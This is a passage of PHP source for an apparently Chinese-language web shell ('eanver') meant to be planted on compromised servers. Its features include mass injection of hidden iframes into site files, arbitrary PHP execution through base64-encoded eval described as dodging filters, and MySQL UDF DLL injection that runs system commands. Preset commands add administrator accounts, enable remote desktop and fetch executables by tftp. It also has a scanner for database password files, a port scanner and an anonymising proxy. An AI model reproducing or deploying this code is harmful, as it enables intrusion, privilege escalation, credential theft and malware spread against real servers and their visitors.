  newRow=document.all.tank.insertRow(-1)
  newcell=newRow.insertCell()
  newcell.innerHTML=\"<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>\"
}

function delTank() {
  if(tank.rows.length==1) return;
  var checkit = false;
  for (var i=0;i<document.all.tankNo.length;i++) {
    if (document.all.tankNo[i].checked) {
      checkit=true;
      tank.deleteRow(i+1);
      i--;
    }
  }
  if (checkit) {
  } else{
    alert(\"请选择一个要删除的对象\");
    return false;
  }
}
</SCRIPT>
<br><br>
<table cellSpacing=0 cellPadding=0 width=\"100%\" border=0>
          <tr>
            <td width=\"7%\"><input class=\"button01\" type=\"button\"  onclick=\"addTank()\" value=\" 添 加 \" name=\"button2\"/>
            <input name=\"button3\"  type=\"button\" class=\"button01\" onClick=\"delTank()\" value=\"删除\" />
            </td>
          </tr>
</table>
<table  id=\"tank\" width=\"100%\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\" >
<tr><td>请选择要上传的文件：</td></tr>
<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
</table>");
        html_n("<br><input type=\"submit\" name=\"upfiles\" value=\"上传\" style=\"width:80px;\"> <input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . root_dir . "';\" style=\"width:80px;\">");
        if (isset($_POST['upfiles'])) {
            foreach ($_FILES["upfile"]["error"] as $key => $error) {
                if ($error == UPLOAD_ERR_OK) {
                    $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
                    $name = $_FILES["upfile"]["name"][$key];
                    $uploadfile = str_path($_POST['uppath'] . '/' . $name);
                    $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3];
                    echo "<br><br>" . $upload;
                }
            }
        }
        html_n("</form>");
        break;
    case "guama":
        $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
        $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
        $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
        html_n("<tr><td>文件类型请用\"|\"隔开,也可以是指定文件名.<form method=\"POST\"><br>");
        html_input("text", "path", $patht, "路径范围", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_input("text", "type", $typet, "<br><br>文件类型", "60");
        html_text("code", "67", "5", $codet);
        html_n("<br><br>");
        html_radio("批量挂马", "批量清马", "guama", "qingma");
        html_input("submit", "passreturn", "开始");
        html_n("</td></tr></form>");
        if (!empty($_POST['path'])) {
            html_n("<tr><td>目标文件:<br><br>");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
        }
        break;
    case "tihuan":
        $newcode = isset($_POST['newcode']) ? $_POST['newcode'] : "";
        $oldcode = isset($_POST['oldcode']) ? $_POST['oldcode'] : "";
        html_n("<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method=\"POST\">");
        html_input("text", "path", root_dir, "路径范围", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_text("newcode", "67", "5", $newcode);
        html_n("<br><br>替换为");
        html_text("oldcode", "67", "5", $oldcode);
        html_input("submit", "passreturn", "替换", "<br><br>");
        html_n("</td></tr></form>");
        if (!empty($_POST['path'])) {
            html_n("<tr><td>目标文件:<br><br>");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
        }
        break;
    case "scanfile":
        $code = isset($_POST['code']) ? $_POST['code'] : "";
        css_js("4");
        html_n("<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method=\"POST\" name=\"sform\"><br>");
        html_input("text", "path", root_dir, "路径名", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_input("text", "code", $code, "<br><br>关键字", "40");
        html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog", "dedecms", "phpcms"), 0, "onchange='return Fulll(options[selectedIndex].value)'");
        html_n("<br><br>");
        html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode");
        html_input("submit", "passreturn", "搜索");
        html_n("</td></tr></form>");
        if (!empty($_POST['path'])) {
            html_n("<tr><td>找到文件:<br><br>");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
        }
        break;
    case "scanphp":
        html_n("<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method=\"POST\"><br>");
        html_input("text", "path", root_dir, "查找范围", "40");
        html_input("checkbox", "pass", "", "使用目录遍历<br><br>脚本类型", "", true);
        html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP"));
        html_input("submit", "passreturn", "查找", "<br><br>");
        html_n("</td></tr></form>");
        if (!empty($_POST['path'])) {
            html_n("<tr><td>找到文件:<br><br>");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
        }
        break;
    case "port":
        $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : "127.0.0.1";
        $Port_port = isset($_POST['port']) ? $_POST['port'] : "21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873";
        html_n("<form method=\"POST\">
<div class=\"actall\">扫描IP <input type=\"text\" name=\"ip\" value=\"" . $Port_ip . "\" style=\"width:600px;\"> </div>
<div class=\"actall\">端口号 <input type=\"text\" name=\"port\" value=\"" . $Port_port . "\" style=\"width:597px;\"></div>
<div class=\"actall\"><input type=\"submit\" value=\"扫描\" style=\"width:80px;\"></div>
</form>");
        if ((!empty($_POST['ip'])) && (!empty($_POST['port']))) {
            echo "<div class=\"actall\">";
            $ports = explode('|', $_POST['port']);
            for ($i = 0; $i < count($ports); $i++) {
                $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
                echo $fp ? "<font color=\"#FF0000\">开放端口 ---> " . $ports[$i] . "</font><br>" : "关闭端口 ---> " . $ports[$i] . "<br>";
                ob_flush();
                flush();
            }
            echo "</div>";
        }
        break;
    case "getcode":
        if (isset($_POST['url'])) {
            $proxycontents = @implode('', @file($_POST['url']));
            $proxycontents2 = $proxycontents;
            $proxycontents = @TestUtf8($proxycontents) ? @iconv("utf-8", "gb2312//IGNORE", $proxycontents) : $proxycontents;
            if (empty($proxycontents))
                $proxycontents = $proxycontents2;
            echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
            exit;
        }
        html_n("<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">
 <form method=\"POST\" target=\"proxyframe\">
  <tr class=\"firstalt\">
	<td align=\"center\"><b>在线代理</b></td>
  </tr>
  <tr class=\"secondalt\">
	<td align=\"center\"  ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : " . $_SERVER['SERVER_NAME'] . "</li></ul></td>
  </tr>
  <tr class=\"firstalt\">
	<td align=\"center\" height=40  >URL: <input name=\"url\" value=\"http://1212.ip138.com/ic.asp\" type=\"text\"  class=\"input\" size=\"100\" >
 <input name=\"\" value=\"浏览\" type=\"submit\"  class=\"input\" size=\"30\" >
</td>
  </tr>
  <tr class=\"secondalt\">
	<td align=\"center\"  ><iframe name=\"proxyframe\" frameborder=\"0\" width=\"765\" height=\"400\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"auto\" src=\"about:blank\"></iframe></td>
  </tr>
</form></table>");
        break;
    case "phpcode":
        $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
        if ($phpcode != "phpinfo();") $phpcode = htmlspecialchars(myunescape(base64_decode($phpcode)));
        echo "<script language=\"javascript\">";
        html_base();
        echo "function SubmitUrl(){
			document.getElementById('phpcode').value = encode64(document.getElementById('phpcode').value);
			document.getElementById('sendcode').submit();
	}</script><tr><td><form method=\"POST\" id=\"sendcode\" >不用写&lt;? ?&gt;标签,此功能优化使用BASE64加密传送，防止恶意代码被拦，用了就知道<br><br><textarea COLS=\"120\" ROWS=\"35\" name=\"phpcode\" id=\"phpcode\">" . $phpcode . "</textarea><br><br><input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">";
        if (!empty($_POST['phpcode'])) {
            echo "<br><br>";
            eval(stripslashes(myunescape(base64_decode($_POST['phpcode']))));
        }
        html_n("</form>");
        break;
    case "myexp":
        $MSG_BOX = "请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.";
        $info = "命令回显";
        $mhost = 'localhost';
        $muser = 'root';
        $mport = '3306';
        $mpass = '';
        $mdata = 'mysql';
        $mpath = "C:/windows/mysqlDll.dll";
        $sqlcmd = 'ver';
        if (isset($_POST['mhost']) && isset($_POST['muser'])) {
            $mhost = $_POST['mhost'];
            $muser = $_POST['muser'];
            $mpass = $_POST['mpass'];
            $mdata = $_POST['mdata'];
            $mport = $_POST['mport'];
            $mpath = File_Str($_POST['mpath']);
            $sqlcmd = $_POST['sqlcmd'];
            $conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass);
            if ($conn) {
                @mysql_select_db($mdata);
                if ((!empty($_POST['outdll'])) && (!empty($_POST['mpath']))) {
                    $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
                    if (@mysql_query($query, $conn)) {
                        $shellcode = Mysql_shellcode();
                        $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                        if (@mysql_query($query, $conn)) {
                            $query = "SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE '" . $mpath . "';";
                            if (@mysql_query($query, $conn)) {
                                $ap = explode('/', $mpath);
                                $inpath = array_pop($ap);
                                $query = "Create Function state returns string soname '" . $inpath . "';";
                                $MSG_BOX = @mysql_query($query, $conn) ? "安装DLL成功" : "安装DLL失败";
                            } else $MSG_BOX = "导出DLL文件失败";
                        } else $MSG_BOX = "写入临时表失败";
                        @mysql_query("DROP TABLE Envl_Temp_Tab;", $conn);
                    } else $MSG_BOX = "创建临时表失败";
                }
                if (!empty($_POST['runcmd'])) {
                    $query = "select state(\"" . $sqlcmd . "\");";
                    $result = @mysql_query($query, $conn);
                    if ($result) {
                        $k = 0;
                        $info = NULL;
                        while ($row = @mysql_fetch_array($result)) {
                            $infotmp .= $row[$k];
                            $k++;
                        }
                        $info = $infotmp;
                        $MSG_BOX = "执行成功";
                    } else $MSG_BOX = "执行失败";
                }
            } else $MSG_BOX = "连接MYSQL失败";
        }
        html_n("<script language=\"javascript\">
function Fullm(i){
	Str = new Array(11);
	Str[0] = \"ver\";
	Str[1] = \"net user envl envl /add\";
	Str[2] = \"net localgroup administrators envl /add\";
	Str[3] = \"net start Terminal Services\";
	Str[4] = \"tasklist /svc\";
	Str[5] = \"netstat -ano\";
	Str[6] = \"ipconfig\";
	Str[7] = \"net user guest /active:yes\";
	Str[8] = \"copy c:/1.php d:/2.php\";
	Str[9] = \"tftp -i 127.0.0.1 get server.exe c:/server.exe\";
	Str[10] = \"net start telnet\";
	Str[11] = \"shutdown -r -t 0\";
	mform.sqlcmd.value = Str[i];
	return true;
}
</script>
<form id=\"mform\" method=\"POST\">
<div id=\"msgbox\" class=\"msgbox\">" . $MSG_BOX . "</div>
<center><div class=\"actall\">
地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
</div><div class=\"actall\">
可加载路径 <input type=\"text\" name=\"mpath\" value=\"" . $mpath . "\" style=\"width:555px\">
<input type=\"submit\" name=\"outdll\" value=\"安装DLL\" style=\"width:80px;\"></div>
<div class=\"actall\">安装成功后可用 <br><input type=\"text\" name=\"sqlcmd\" value=\"" . $sqlcmd . "\" style=\"width:515px;\">
<select onchange=\"return Fullm(options[selectedIndex].value)\">
<option value=\"0\" selected>--命令集合--</option>
<option value=\"1\">添加管理员</option>
<option value=\"2\">设为管理组</option>
<option value=\"3\">开启远程桌面</option>
<option value=\"4\">查看进程和PID</option>
<option value=\"5\">查看端口和PID</option>
<option value=\"6\">查看IP</option>
<option value=\"7\">激活guest帐户</option>
<option value=\"8\">复制文件</option>
<option value=\"9\">ftp下载</option>
<option value=\"10\">开启telnet</option>
<option value=\"11\">重启</option>
</select>
<input type=\"submit\" name=\"runcmd\" value=\"执行\" style=\"width:80px;\">
<textarea style=\"width:720px;height:300px;\">" . $info . "</textarea>
</div></center>
</form>");
        break;
    case "mysql_exec":
        $cookie_name_mysql = $envlpath . "mysql";
        if (isset($_COOKIE[$cookie_name_mysql . "user"])) {
            die("<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
        }
        if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
            if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
                $cookietime = time() + 6 * 3600;
                setcookie($cookie_name_mysql . 'host', $_POST['mhost'], $cookietime);
                setcookie($cookie_name_mysql . 'port', $_POST['mport'], $cookietime);
                setcookie($cookie_name_mysql . 'user', $_POST['muser'], $cookietime);
                setcookie($cookie_name_mysql . 'pass', $_POST['mpass'], $cookietime);
                die("正在登陆,请稍候...<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
            } else {
                echo "登陆失败";
            }
        }
        html_n("<form method=\"POST\" name=\"oform\" id=\"oform\">
<div class=\"actall\">地址 <input type=\"text\" name=\"mhost\" value=\"localhost\" style=\"width:300px\"></div>
<div class=\"actall\">端口 <input type=\"text\" name=\"mport\" value=\"3306\" style=\"width:300px\"></div>
<div class=\"actall\">用户 <input type=\"text\" name=\"muser\" value=\"root\" style=\"width:300px\"></div>
<div class=\"actall\">密码 <input type=\"text\" name=\"mpass\" value=\"\" style=\"width:300px\"></div>
<div class=\"actall\"><input type=\"submit\" value=\"登陆\" style=\"width:80px;\"></div>
</form>");
        break;
    case "mysql_msg":
        $cookie_name_mysql = $envlpath . "mysql";
        $conn = @mysql_connect($_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'], $_COOKIE[$cookie_name_mysql . 'user'], $_COOKIE[$cookie_name_mysql . 'pass']);
        if ($conn) {
            html_n("<script language=\"javascript\">
function Delok(msg,gourl)
{
	smsg = \"确定要删除[\" + unescape(msg) + \"]吗?\";
	if(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
	return false;
}");
            html_base();
            html_n("function SubmitUrl(){
			document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
			document.getElementById('gform').submit();
}
</script>");
            $BOOL = false;
            $MSG_BOX = "用户:" . $_COOKIE[$cookie_name_mysql . 'user'] . " &nbsp;&nbsp;&nbsp;&nbsp; 地址:" . $_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'] . " &nbsp;&nbsp;&nbsp;&nbsp; 版本:";
            $k = 0;
            $result = @mysql_query("select version();", $conn);
            while ($row = @mysql_fetch_array($result)) {
                $MSG_BOX .= $row[$k];
                $k++;
            }
            echo "<div class=\"actall\"> 数据库:";
            $result = @mysql_query("SHOW DATABASES", $conn);
            while ($db = @mysql_fetch_array($result)) {
                echo "&nbsp;&nbsp;[<a href=\"?eanver=mysql_msg&db=" . $db['Database'] . '">' . $db['Database'] . "</a>]";
            }
            echo "</div>";
            if (isset($_GET['db'])) {
                @mysql_select_db($_GET['db'], $conn);
                $textarea = "";
                $querya = "";
                $queryb = "";
                $queryc = "";
                if (isset($_POST['nsql'])) {
                    $_POST['nsql'] = base64_decode($_POST['nsql']);
                    $textarea = $_POST['nsql'];
                    $BOOL = true;
                    $MSG_BOX = @mysql_query($_POST['nsql'], $conn) ? "执行成功" : "执行失败 " . @mysql_error();
                }
                if (isset($_POST['insql']) && is_array($_POST['insql'])) {
                    $query = "INSERT INTO " . $_GET['table'] . ' (';
                    foreach ($_POST['insql'] as $var => $key) {
                        $querya .= $var . ',';
                        $queryb .= '\'' . addslashes($key) . '\',';
                    }
                    $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                    $MSG_BOX = @mysql_query($query, $conn) ? "添加成功" : "添加失败 " . @mysql_error();
                }
                if (isset($_POST['upsql']) && is_array($_POST['upsql'])) {
                    $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                    foreach ($_POST['upsql'] as $var => $key) {
                        $queryb .= $var . '=\'' . addslashes($key) . '\',';
                    }
                    $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                    $MSG_BOX = @mysql_query($query, $conn) ? "修改成功" : "修改失败 " . @mysql_error();
                }
                if (isset($_GET['del'])) {
                    $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                    $good = @mysql_fetch_assoc($result);
                    $query = "DELETE FROM " . $_GET['table'] . ' WHERE ';
                    foreach ($good as $var => $key) {
                        $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                    }
                    $where = $query . substr($queryc, 0, -4) . ';';
                    $MSG_BOX = @mysql_query($where, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
                }
                $action = "?eanver=mysql_msg&db=" . $_GET['db'];
                if (isset($_GET['drop'])) {
                    $query = "Drop TABLE IF EXISTS " . $_GET['drop'] . ';';
                    $MSG_BOX = @mysql_query($query, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
                }
                if (isset($_GET['table'])) {
                    $action .= '&table=' . $_GET['table'];
                    if (isset($_GET['edit'])) $action .= '&edit=' . $_GET['edit'];
                }
                if (isset($_GET['insert'])) $action .= '&insert=' . $_GET['insert'];
                echo "<div class=\"actall\"><form method=\"POST\" action=\"" . $action . "\" name=\"gform\" id=\"gform\">";
                echo "<textarea name=\"nsql\" id=\"nsql\" style=\"width:500px;height:50px;\">" . $textarea . "</textarea> ";
                echo "<input type=\"button\" name=\"querysql\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:60px;height:49px;\"> <input type=\"button\" value=\"创建表\" style=\"width:60px;height:49px;\" onclick=\"Createok('a')\"> <input type=\"button\" value=\"创建库\" style=\"width:60px;height:49px;\" onclick=\"Createok('b')\"> <input type=\"button\" value=\"删除库\" style=\"width:60px;height:49px;\" onclick=\"Createok('c')\"></form></div><div class=\"msgbox\" style=\"height:40px;\">" . $MSG_BOX . "</div><div class=\"actall\"><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '">' . $_GET['db'] . "</a> ---> ";
                if (isset($_GET['table'])) {
                    echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
                    echo "[<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $_GET['table'] . "\">插入</a>]</div>";
                    if (isset($_GET['edit'])) {
                        if (isset($_GET['p'])) $atable = $_GET['table'] . '&p=' . $_GET['p']; else $atable = $_GET['table'];
                        echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $atable . '">';
                        $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                        $good = @mysql_fetch_assoc($result);
                        $u = 0;
                        foreach ($good as $var => $key) {
                            $queryc .= $var . '=\'' . $key . '\' AND ';
                            $type = @mysql_field_type($result, $u);
                            $len = @mysql_field_len($result, $u);
                            echo "<div class=\"actall\">" . $var . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"upsql[" . $var . "]\" style=\"width:600px;height:60px;\">" . htmlspecialchars($key) . "</textarea></div>";
                            $u++;
                        }
                        $where = 'WHERE ' . substr($queryc, 0, -4);
                        echo "<input type=\"hidden\" id=\"wherevar\" name=\"wherevar\" value=\"" . base64_encode($where) . "\"><div class=\"actall\"><input type=\"submit\" value=\"Update\" style=\"width:80px;\"></div></form>";
                    } else {
                        $query = "SHOW COLUMNS FROM " . $_GET['table'];
                        $result = @mysql_query($query, $conn);
                        $fields = array();
                        $pagesize = 20;
                        $row_num = @mysql_num_rows(@mysql_query("SELECT * FROM " . $_GET['table'], $conn));
                        $numrows = $row_num;
                        $pages = intval($numrows / $pagesize);
                        if ($numrows % $pagesize) $pages++;
                        if (!isset($_GET['p'])) {
                            $p = 0;
                            $_GET['p'] = 1;
                        } else {
                            $p2 = ((int)$_GET['p']);
                            if ($p2 > $pages)
                                $p2 = $pages;
                            else if ($p2 < 1)
                                $p2 = 1;
                            $p = ($p2 - 1) * 20;
                            $_GET['p'] = $p2;
                        }
                        $page = $_GET['p'];
                        $offset = $pagesize * ($page - 1);


                        echo "<table border=\"0\"><tr>";
                        echo "<td class=\"toptd\" style=\"width:70px;\" nowrap>操作</td>";
                        while ($row = @mysql_fetch_assoc($result)) {
                            array_push($fields, $row['Field']);
                            echo "<td class=\"toptd\" nowrap>" . $row['Field'] . "</td>";
                        }
                        echo "</tr>";
                        $nsql = isset($_POST['nsql']) ? $_POST['nsql'] : "";
                        if (preg_match('/WHERE|LIMIT/', $nsql) && preg_match('/SELECT|FROM/', $nsql))
                            $query = $nsql;
                        else
                            $query = "SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
                        $result = @mysql_query($query, $conn);
                        $v = $p;
                        while ($text = @mysql_fetch_assoc($result)) {
                            echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . "\"> 修改 </a> <a href=\"#\" onclick=\"Delok('它','?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . "');return false;\"> 删除 </a></td>";
                            foreach ($fields as $row) {
                                echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . "</td>";
                            }
                            echo "</tr>" . "\r\n";
                            $v++;
                        }
                        echo "</table><div class=\"actall\">";
                        $pagep = $page - 1;
                        $pagen = $page + 1;
                        echo "共有 " . $row_num . " 条记录 ";
                        $pagenav = "";
                        $pageStr = $row_num > 0 ? $page : "0";
                        $charseta = isset($_GET['charset']) ? $_GET['charset'] : "";
                        if ($pagep > 0) $pagenav .= "  <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=1&charset=" . $charseta . "'>首页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $charseta . "'>上一页</a> "; else $pagenav .= " 上一页 ";
                        if ($pagen <= $pages) $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $charseta . "'>下一页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $charseta . "'>尾页</a>"; else $pagenav .= " 下一页 ";
                        $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页   跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='" . $pageStr . "' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p='+this.value+'&charset=" . $charseta . "';\" />页";
                        echo $pagenav;
                        echo "</div>";
                    }
                } elseif (isset($_GET['insert'])) {
                    echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">' . $_GET['insert'] . "</a></div>";
                    $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn);
                    $fieldnum = @mysql_num_fields($result);
                    echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">';
                    for ($i = 0; $i < $fieldnum; $i++) {
                        $name = @mysql_field_name($result, $i);
                        $type = @mysql_field_type($result, $i);
                        $len = @mysql_field_len($result, $i);
                        echo "<div class=\"actall\">" . $name . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"insql[" . $name . "]\" style=\"width:600px;height:60px;\"></textarea></div>";
                    }
                    echo "<div class=\"actall\"><input type=\"submit\" value=\"Insert\" style=\"width:80px;\"></div></form>";
                } else {
                    $query = "SHOW TABLE STATUS";
                    $status = @mysql_query($query, $conn);
                    while ($statu = @mysql_fetch_array($status)) {
                        $statusize[] = $statu['Data_length'];
                        $statucoll[] = $statu['Collation'];
                    }
                    $query = "SHOW TABLES FROM " . $_GET['db'] . ';';
                    echo "</div><table border=\"0\"><tr><td class=\"toptd\" style=\"width:550px;\"> 表名 </td><td class=\"toptd\" style=\"width:80px;\"> 操作 </td><td class=\"toptd\" style=\"width:130px;\"> 字符集 </td><td class=\"toptd\" style=\"width:70px;\"> 大小 </td></tr>";
                    $result = @mysql_query($query, $conn);
                    $k = 0;
                    while ($table = @mysql_fetch_row($result)) {
                        $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
                        echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $table[0] . '">' . $table[0] . "</a></td>";
                        echo "<td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $table[0] . "\"> 插入 </a> <a href=\"#\" onclick=\"Delok('" . $table[0] . "','?eanver=mysql_msg&db=" . $_GET['db'] . '&drop=' . $table[0] . "');return false;\"> 删除 </a></td>";
                        echo '<td>' . $statucoll[$k] . "</td><td align=\"right\">" . File_Size($statusize[$k]) . "</td></tr>" . "\r\n";
                        $k++;
                    }
                    echo "</table>";
                }
            }
        } else {
            $cookietime = time() - 6 * 3600;
            setcookie($cookie_name_mysql . 'host', "", $cookietime);
            setcookie($cookie_name_mysql . 'port', "", $cookietime);
            setcookie($cookie_name_mysql . 'user', "", $cookietime);
            setcookie($cookie_name_mysql . 'pass', "", $cookietime);
            die("连接MYSQL失败,请重新登陆.<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=mysql_exec\">");
        }
        break;
    default:
        html_main();
        break;
}
css_foot();
ob_end_flush();
